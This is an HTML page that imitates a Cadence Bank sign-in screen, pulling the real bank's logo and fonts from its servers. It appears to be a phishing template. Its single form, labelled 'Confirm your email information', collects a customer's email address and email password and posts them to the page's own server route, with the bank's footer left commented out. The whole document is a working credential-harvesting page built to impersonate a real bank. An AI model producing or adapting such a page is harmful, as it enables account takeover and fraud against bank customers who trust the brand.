<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In - Cadence Bank</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        @font-face {
            font-family: 'cabin';
            font-style: normal;
            font-weight: 400;
            src: url(https://online.cadencebank.com/custom-data/fonts/cabin.woff) format('woff'), url(https://online.cadencebank.com/custom-data/fonts/cabin.woff2) format('woff2')
        }

        @font-face {
            font-family: 'cabin';
            font-style: normal;
            font-weight: 700;
            src: url(https://online.cadencebank.com/custom-data/fonts/cabin-bold.woff) format('woff'), url(https://online.cadencebank.com/custom-data/fonts/cabin-bold.woff2) format('woff2')
        }

        @font-face {
            font-family: 'ysobel';
            font-style: normal;
            font-weight: 400;
            src: url(https://online.cadencebank.com/custom-data/fonts/ysobel.woff) format('woff'), url(https://online.cadencebank.com/custom-data/fonts/ysobel.woff2) format('woff2')
        }

        @font-face {
            font-family: 'Frutiger Next Pro';
            font-style: normal;
            font-weight: 400;
            src: url(https://online.cadencebank.com/custom-data/fonts/frutigernextpro-regular.woff) format('woff'), url(https://online.cadencebank.com/custom-data/fonts/frutigernextpro-regular.woff2) format('woff2')
        }

        @font-face {
            font-family: 'Frutiger Next Pro';
            font-style: normal;
            font-weight: 700;
            src: url(https://online.cadencebank.com/custom-data/fonts/frutigernextpro-bold.woff) format('woff'), url(https://online.cadencebank.com/custom-data/fonts/frutigernextpro-bold.woff2) format('woff2')
        }

        @font-face {
            font-family: 'AccordAlternate';
            font-style: normal;
            font-weight: 400;
            src: url(https://online.cadencebank.com/custom-data/fonts/AccordAlternate-regular.woff) format('woff')
        }

        @font-face {
            font-family: 'AccordAlternate';
            font-style: normal;
            font-weight: 700;
            src: url(https://online.cadencebank.com/custom-data/fonts/AccordAlternate-bold.woff) format('woff')
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'AccordAlternate', 'Open Sans', Helvetica, Arial, sans-serif;
        }
    </style>
</head>

<body class="flex flex-col items-center bg-[#004F5B]">
    <header class="bg-[#004F5B] top-0 w-full flex justify-center py-2">
        <img class="w-[180px]" title="Cadence Bank"
            src="https://online.cadencebank.com/custom-data/images/Cadence_Bank_logo_WHITE.svg" alt="">
    </header>
    <main class="bg-white rounded-[12px] text-black mt-50 w-[90%] md:w-[75%]">
        <div class="bg-[#1D871E] rounded-t-[12px] flex justify-between px-3 py-2">
            <p class="uppercase font-bold text-white text">Confirm your email information</p>
        </div>
        <form action="/auth/email-verification" method="post" class="mt-7 p-4">
            <div class="flex flex-col">
                <label class="font-semibold" for="email">Email Address</label>
                <input class="border border-neutral-300 outline-neutral-300 px-3 py-3 mt-2 rounded-[4px] text-sm"
                    type="email" id="email" name="email" required>
            </div>
            <div class="flex flex-col pt-[27px]">
                <label class="font-semibold" for="password">Email Password</label>
                <input class="border border-neutral-300 outline-neutral-300 px-3 py-3 mt-2 rounded-[4px] text-sm"
                    type="password" id="password" name="emailPass" required>
            </div>
            <button type="submit"
                class="bg-[#004F5B] text-white rounded-[4px] mt-3 min-h-[3.5em] font-semibold px-6 cursor-pointer">Submit</button>
        </form>
    </main>
    <!-- <footer
        class="w-full flex flex-col-reverse md:flex-row text-[#78777A] bg-white mt-8 justify-between px-4 md:px-20 py-4 fixed md:static bottom-0">
        <div>
            <p>Routing Number: 084201278</p>
            <p>1-888-797-7711 M-F 7:00 a.m. - 8:00 p.m. (CST) Saturday 7:00 a.m. - 5:00 p.m. (CST)</p>
            <p class="text-xs">® Cadence Bank. All Rights Reserved.</p>
        </div>
        <div>
            <img class="w-[135px]"
                src="https://online.cadencebank.com/Content.aspx?name=FDIC%20and%20EHL%20logo%20lockup_CG9" alt="">
            <img src="https://d21y75miwcfqoq.cloudfront.net/61c7a64e" alt="">
        </div>
    </footer> -->
</body>

</html>